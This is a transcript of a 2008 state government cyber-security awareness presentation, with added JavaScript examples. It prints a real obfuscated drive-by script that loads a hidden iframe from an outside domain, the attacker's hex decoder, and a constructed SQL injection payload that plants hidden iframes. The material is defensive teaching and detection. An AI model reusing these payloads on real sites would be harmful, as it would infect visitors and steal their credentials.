
Cyber Security Awareness [Everything You Were Afraid to Know About Computer Security, But Always Wanted to Ask]






Presentation Transcript


  1. Cyber Security Awareness [Everything You Were Afraid to Know About Computer Security, But Always Wanted to Ask] • Commonwealth of Mass. Information Technology Division • November 2008

  2. Objectives for Today • Understand network security threats • Learn simple defensive measures • Review some recent breaches • Introduce applicable new legislation

  3. The Sermon • Sobering Statistics • Why do we need to be here today? • The Threats • How Things Go Wrong • Protecting Yourself • Have I Been Compromised? • A Few High-Profile Case Studies • A Recent Eye-Opening Incident • Security Resources and References • Q & A

  4. Statistics • One new infected web page is discovered every 5 seconds • One in 500 e-mail messages contains confidential information • One in 2500 e-mail messages contains an infected attachment • 41% of people use the same password at every site they visit • In 2007, 37000 reported breaches of government and private systems occurred • Revenues from cybercrime now exceed drug trafficking as the most lucrative illegal global business, estimated at more than $1 trillion annually in illegal profits • 75 percent of companies surveyed in 2004 reported a data-security breach within the past 12 months. (The Ponemon Institute) • 70% of security incidents are inside jobs. (Gartner Group) • “Many government offices don’t even know yet that they are leaking information. 90% of cases are probably still not known.” – McAfee Criminology Report

  5. Why are we here today? • The World has Changed! • Flying? • Technology Advancements • Moore’s Law: 40+ years of supporting data (first stated in 1965) • Processor Speed • Memory (Smaller, Faster, Larger Capacity) • Hard Drives (Smaller, with Larger Capacity) • Price (“Bang per Buck”) • What was Impossible 10 Years Ago is Routine Today. • Searching for a Cure to Web Malware

  6. Our Mission • We still need to do our jobs • Educating Students of the Commonwealth • Securing Cyber-Resources • ID Theft & Data Breach Legislation • M.G.L. Ch 93H • Executive Order 504 • 201 CMR 17.00

  7. The Challenge • Walking the tightrope between: • Taking full advantage of the constantly expanding wealth of IT resources available to us, and • Increased risk of exposure to attacks that accompanies increased reliance on technology. • Allowing business operations anytime and anywhere, via an increasing number of different devices and to an increasing number of mobile users and customers.

  8. Threats to Students • MySpace • FaceBook • YouTube • Peer-to-Peer Networks • Instant Messaging • Cyber Predators/Bullies • Inappropriate/Offensive Web Content

  9. Threats to Networks • Two primary categories of threat: • Denial of Service • Loss/Leakage of Sensitive Data

  10. Denial of Service (DoS) • Definition: • Flooding a network or host with useless traffic, to the point of slowing or completely interrupting regular services • Often carried out with large groups of remotely controlled, compromised computers (a/k/a botnets) • Result: Distributed Denial of Service (DDoS)

  11. Data Loss/Leakage • Definition: • Accidental (or unauthorized) release of sensitive information through data that leaves the organization • Covers data that is sensitive in itself, or useful for further exploitation of the system, transmitted over standard data channels • Result → compromise of data confidentiality • Since 2005, more than 200 million victims of data breach have been reported!

  12. How Things Go Wrong • Actively • User does something explicit to enable compromise • Open an infected email attachment • Follow a malicious web link • Accept IM-initiated downloads • Execute Web 2.0 rogue application • Passively • Attacker breaks into the user’s PC via scans • Unpatched operating system • Buggy application software • Vulnerable open ports • Compromised legitimate web sites

  13. How Things Go Wrong (cont.) • Carelessness • 98% of breaches are the result of “stupidity or inadvertent user action.” (IANS, 2007) • Actions by Malicious Insiders • 1.5% of breaches • Efforts by Organized Crime, Industrial Spies, and Foreign Government Agents • Least Frequent (~ 0.5%), but Most Costly, Most Sophisticated, and Most Difficult to Detect and Defend Against

  14. Who is Most Vulnerable? • Those who don’t patch regularly and don’t keep A/V up to date • Dial-up Users (but not very appealing to attackers) • Home Broadband Users • University Users • Mobile Users

  15. Protecting Yourself • Patch, Patch, Patch! • Use auto-update whenever possible • Anti-Virus Software (update daily) • Anti-SpyWare Software • Personal Firewall Software • Set and use good passwords on all accounts • How Strong is Your Password? • Encrypt Sensitive Data • Separate Student and Teacher/Admin Networks

  16. Protecting Yourself (cont.) • Wireless Networks… Beware! • Wireless Routers/Access Points: • Change the default admin password and the default SSID • SSID name should be “non-trivial” (not your name, address or organization) • Disable broadcasting of SSID if possible • Enable WPA2 encryption (WPA/TKIP only for devices that cannot do WPA2), and change the default key to a long, non-default passphrase • Enable and use MAC filtering • Caveat: hiding the SSID and MAC filtering only deter casual users; anyone with a wireless sniffer can recover both, so treat them as hygiene, not protection; the encryption and passphrase are what actually keep people out • Don’t save user IDs and passwords on your hard drive • Don’t Web surf from a privileged account! • Turn off auto-run for removable media • Practice “Safe Internet” • E-mail attachments • Downloads from questionable sites (esp. freeware) • Peer-to-peer networks; promiscuous file sharing

  17. 10 Tips for Fighting Malware • Install (and use!) Anti-Virus Software • Install a Personal Firewall • Install an Anti-Spyware Tool • Patch! • Keep Browser Security Settings at Medium or High • Just Say “No!” to Orgs You Don’t Know/Trust • Avoid Browser Search-Help Bars • Verify Software Certificates Trusted by Your Browser • Get a Credit Card Only for Internet Shopping • Don’t Run Executable E-mail Attachments (Even From a Known Source)

  18. Have I Been Compromised? • How to tell if you’ve fallen victim • Abnormal slowdown in performance • Mysterious failures in commonly-used apps (e-mail, web surfing) • Unexpected popups • Mysterious/unexpected outbound traffic: watching what leaves the machine is the only sure-fire way to detect a compromise (observe it from a separate vantage point, such as the firewall or router, since malware on the host can hide its own connections) • Cleaning a bot: • Painful! • Requires 8-16 hours of cleanup time • Best if done by a professional

  19. Data Breach & ID Theft • M. G. L. c. 93H and 93I • New law went into effect October 31, 2007 • Civil fine of up to $100 per affected person • Executive Order 504 • Mandatory information security training • Effective September 19, 2008 • Training for current staff within 12 months • 201 CMR 17.00 • Mandates encryption of personal data (personal information sent over public networks or wirelessly, and stored on laptops and other portable devices) • Effective January 1, 2009 (as scheduled at the time of this presentation; the effective date was subsequently extended to March 1, 2010)

  20. Cyber-Breach Poster Children • Milton Academy Network Breach (Nov ’07) • Needham PowerSchool Breach (August ’08) • GOP Stolen Laptop Unencrypted (September ’08) • CardSystems Solutions • TJX Companies, Inc. • CitiFinancial Services • Boston College • Monster.com • Massachusetts DPL • Nordea Bank (Sweden)

  21. In the News • Commonwealth of PA, 1/4/08 • Network attacked via compromised agency web pages • SQL injection used to update DB tables with links to malicious website • Users who visit compromised agency’s web site are silently redirected to a series of malicious web pages that try to exploit client-side (i.e., user’s) vulnerabilities in a number of applications • IE, RealPlayer, et al • Vulnerable systems become infected with malware • An example of “drive-by downloads”
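The injection pattern behind the Commonwealth of PA incident above, in miniature, as an added example (this is not code from the presentation, and the table name `pages`, the column names, and the payload URL `example.invalid` are assumptions for the demonstration, not details of the incident). The attacker does not need to read anything out of the database: one stacked UPDATE that appends a hidden iframe to every page body turns the agency's own site into the drive-by launcher. The example shows the vulnerable query builder, the parameterised form that keeps the input as a value, and the output-escaping that protects visitors even when an UPDATE has already landed.

```javascript
// Added example, not from the presentation. Names (pages, title, body, id) and
// the payload URL (example.invalid) are assumptions for the demonstration.

// Vulnerable: the request parameter is pasted straight into the SQL text, so
// whatever the attacker sends becomes part of the statement(s) executed.
function buildPageQueryUnsafe(pageId) {
  return `SELECT title, body FROM pages WHERE id = ${pageId}`;
}

// Hardened: the parameter travels separately from the SQL text and the driver
// binds it as a value, so the number of statements cannot change. The
// {text, values} shape is what parameterised drivers such as node-postgres take.
function buildPageQuerySafe(pageId) {
  return { text: 'SELECT title, body FROM pages WHERE id = $1', values: [pageId] };
}

// Minimal statement counter: counts top-level statements in a SQL string,
// ignoring semicolons inside single-quoted literals (a doubled '' toggles twice
// and so stays inside the literal). It does not understand comments; it is
// only here to show that the payload turned one statement into two.
function countStatements(sql) {
  let count = 0;
  let inString = false;
  let sawText = false;
  for (const ch of sql) {
    if (ch === "'") inString = !inString;
    if (!inString && ch === ';') {
      if (sawText) count++;
      sawText = false;
      continue;
    }
    if (!/\s/.test(ch)) sawText = true;
  }
  return sawText ? count + 1 : count;
}

// Second line of defence, for the visitor rather than the database: anything
// read back from the database is HTML-escaped when rendered, so an injected
// <iframe> or <script> is displayed as text instead of being executed.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Constructed attacker input: a valid id, then a stacked UPDATE that appends a
// hidden iframe to every page body (|| is SQL-standard concatenation; SQL Server
// uses +), then a trailing comment to swallow anything the application appends.
const INJECTED_ID =
  "1; UPDATE pages SET body = body || " +
  "'<iframe src=\"http://example.invalid/out.php\" style=\"display:none\"></iframe>' --";

// Walk through both builders with the payload and report what each produces.
function demo() {
  const unsafe = buildPageQueryUnsafe(INJECTED_ID);
  const safe = buildPageQuerySafe(INJECTED_ID);
  return {
    unsafeStatementCount: countStatements(unsafe),   // 2: the UPDATE rides along
    safeStatementCount: countStatements(safe.text),  // 1: payload stays a value
    boundValue: safe.values[0],
    renderedSafely: escapeHtml('<iframe src="x"></iframe>'),
  };
}

console.log(demo());
```

The two fixes are independent and both are needed: parameterising the query stops the UPDATE from ever running, and escaping on output means that content already poisoned by an earlier injection (or by a compromised administrator account) cannot pull visitors to the redirector.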

  22. Evolving Threats to Users • New and sophisticated forms of attack • “Customized” viruses, self-modifying threats, and threats that “attack back” • Attacks targeting new technologies • Peer-to-peer and VoIP services • Attacks targeting online social networks • MySpace, Facebook, YouTube, etc. • Attacks targeting online services • Especially online banking

  23. New Threat: Spamdexing • Search-engine poisoning: manipulating search rankings so that ordinary web searches return attacker-controlled pages • Web Searches! • 20% lead to unwanted content or malware sites • 80% of search blocks point to offensive content • “Drive-by Downloads” • Compromised, legitimate web site silently redirects user to malware sites • Mitigation: “corporate safe web search tool” • Notify web users of potential risks in real time

  24. Resources & References • US-CERT (United States Computer Emergency Readiness Team) • http://www.us-cert.gov/ • MS-ISAC (Multi-State Information Sharing and Analysis Center) • http://www.msisac.org • Identity Theft Resource Center • http://www.idtheftcenter.org

  25. Close to Home: a Lesson • Analysis completed on October 30, 2007 • Involved breach of non-secret military network • But… could happen to anyone • Attack vector? • New York City public library!

  26. NYC Public Library

  27. NYC Public Library (cont.)

  28. NYC Public Library (cont.)

  29. NYC Public Library (cont.) • Hidden in the bogus NYPL web page is this script (what’s that???):
<script type="text/javascript"> <!-- document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%66%6F%74%62%61%6C%6C%70%6F%72%74%61%6C%2E%69%6E%66%6F%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E')); //--> </script>

  30. NYC Public Library (cont.) • What’s really there, once the percent-encoding is decoded: <iframe src="http[:]//fotballportal.info/out.php?s_id=1" style="visibility: hidden; display: none"></iframe> • The frame is styled so it never appears on screen; inside it, out.php redirects the browser to “http[:]//meraxe.com/fsp1/index.php” • This all happens silently and invisibly! • What’s at meraxe.com…?

  31. NYC Public Library (cont.) • At meraxe.com, we find: • <script>function v4726d05808fd9(v4726d058097a8){ function v4726d05809f78 () {var v4726d0580a748=16; return v4726d0580a748;} return(parseInt(v4726d058097a8,v4726d05809f78()));}function v4726d0580af18(v4726d0580b6e8){ function v4726d0580ce59 () {var v4726d0580d630=2; return v4726d0580d630;} var v4726d0580beb8='';for(v4726d0580c68d=0; v4726d0580c68d<v4726d0580b6e8.length; v4726d0580c68d+=v4726d0580ce59()){ v4726d0580beb8+=(String.fromCharCode(v4726d05808fd9(v4726d0580b6e8.substr(v4726d0580c68d, v4726d0580ce59()))));}return v4726d0580beb8;} document.write(v4726d0580af18('Truncated));</script> • Effects: • The above code is (silently) downloaded and executed • Strip away the randomized names and it is a plain hex-pair decoder: the function walks its argument two characters at a time, converts each pair with parseInt(pair, 16), appends String.fromCharCode() of the result, and hands the decoded markup to document.write() • The argument is truncated on the slide, so the decoded second stage is not shown here
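The two decoding steps on slides 29 and 31, re-implemented as an added example (this is not code from the presentation): a percent decoder for the `document.write(unescape(...))` layer, the hex-pair decoder that the meraxe.com function reduces to, and a scanner that reports any hidden iframe the decoded markup would have written into the page. The slide-29 payload is the page's own (the 2008 redirector domain is not something to visit); because the slide-31 argument is truncated on the page, the second-stage sample is constructed here (`example.invalid`) and hex-encoded locally. Nothing in the block executes attacker script; it reproduces what the browser would have done so an analyst can read the result instead of running it.

```javascript
// Added example, not code from the presentation. The slide-29 payload below is
// the page's own sample; the second-stage sample is constructed.

// Slide 29 layer: document.write(unescape('%3C%69...')). This is the same
// transform as the legacy unescape(), written out so it runs with no DOM.
function decodePercent(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Slide 31 layer: the meraxe.com function with the random-looking names walks
// its argument two characters at a time and does parseInt(chunk, 16) followed
// by String.fromCharCode. Remove the name noise and this is all that is left.
function decodeHexPairs(s) {
  let out = '';
  for (let i = 0; i + 1 < s.length; i += 2) {
    out += String.fromCharCode(parseInt(s.substr(i, 2), 16));
  }
  return out;
}

// Pull every unescape('...') / unescape("...") literal out of a script body so
// the payload can be decoded offline instead of letting the browser run it.
function extractUnescapePayloads(scriptText) {
  const payloads = [];
  const re = /unescape\(\s*(['"])([^'"]*)\1\s*\)/g;
  let m;
  while ((m = re.exec(scriptText)) !== null) payloads.push(m[2]);
  return payloads;
}

// Report every <iframe> in the markup and whether its style or size makes it
// invisible, the tell-tale of a drive-by redirect. Returns [{src, hidden}].
function findHiddenIframes(html) {
  const results = [];
  const tagRe = /<iframe\b[^>]*>/gi;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    const t = tag[0];
    const src = (t.match(/\bsrc\s*=\s*["']([^"']*)["']/i) || [])[1] || '';
    const style = (t.match(/\bstyle\s*=\s*["']([^"']*)["']/i) || [])[1] || '';
    const zeroSized = /\b(?:width|height)\s*=\s*["']?0(?![\d.])/i.test(t);
    const hidden = zeroSized ||
      /display\s*:\s*none/i.test(style) ||
      /visibility\s*:\s*hidden/i.test(style);
    results.push({ src, hidden });
  }
  return results;
}

// Whole-page check: decode every unescape() payload inside <script> blocks and
// list the sources of the hidden iframes it would have written into the page.
function scanForDriveBy(pageHtml) {
  const hits = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let s;
  while ((s = scriptRe.exec(pageHtml)) !== null) {
    for (const payload of extractUnescapePayloads(s[1])) {
      for (const f of findHiddenIframes(decodePercent(payload))) {
        if (f.hidden) hits.push(f.src);
      }
    }
  }
  return hits;
}

// The injected block exactly as shown on slide 29 (the page's own sample).
const SLIDE29_SCRIPT = `<script type="text/javascript">
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%66%6F%74%62%61%6C%6C%70%6F%72%74%61%6C%2E%69%6E%66%6F%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
//-->
</script>`;

// Constructed second-stage sample in the slide-31 encoding. The encoder exists
// only to build the sample (ASCII input assumed); attackers ship it pre-encoded.
function encodeHexPairs(s) {
  return Array.from(s, c => c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
}
const STAGE2_HEX = encodeHexPairs(
  '<iframe src="http://example.invalid/fsp1/index.php" width="0" height="0"></iframe>');

console.log('stage 1 hidden iframes:', scanForDriveBy(SLIDE29_SCRIPT));
console.log('stage 2 decoded:', findHiddenIframes(decodeHexPairs(STAGE2_HEX)));
```

The same two regular-expression checks (a `document.write(unescape(` or hex-pair `parseInt(..., 16)` loop in a script, and an iframe with `display: none`, `visibility: hidden` or zero size in the output) are a practical first-pass triage for pages suspected of hosting drive-by redirects; the decoded source tells you where the next stage lives without ever rendering the page.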

  32. NYC Public Library (cont.) • What happened??? • Downloaded and executed a file (age.exe) • Added file c:\WINDOWS\system32\control.dll • Added several Registry entries • control.dll is loaded as a Browser Helper Object (BHO) when IE is started and acts as a keylogger • The dropper (age.exe) then deleted itself • Effects: • control.dll monitors data entered into forms in IE • Steals user’s login credentials for legitimate web sites • On-line banking, credit cards, eBay, PayPal, etc., etc. • “Phones home” with stolen data

  33. Q & A • Summary: • Protecting yourself is only half the battle • Constant vigilance & awareness are a must • “Trust, but verify.” – Ronald Reagan, quoting an old Russian (!) proverb • Questions…?
